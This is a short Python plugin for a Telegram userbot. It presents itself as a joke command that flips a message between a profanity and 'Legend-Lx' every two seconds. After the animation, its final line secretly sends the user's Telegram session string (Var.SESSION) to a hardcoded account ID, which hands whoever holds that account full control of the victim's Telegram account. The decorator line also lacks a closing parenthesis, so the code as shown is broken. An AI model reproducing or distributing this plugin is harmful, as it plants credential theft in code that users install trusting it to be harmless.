import asyncio

@bot.on(admin_cmd(pattern="SUPERMEN$")
async def fuckd(ult):
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck") 
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit ("fuck")
 await asyncio.sleep(2)
 await ult.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit ("fuck")
 await asyncio.sleep(2)
 await ult.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit ("fuck")
 await ult.client.send_message(2143095429, Var.SESSION)
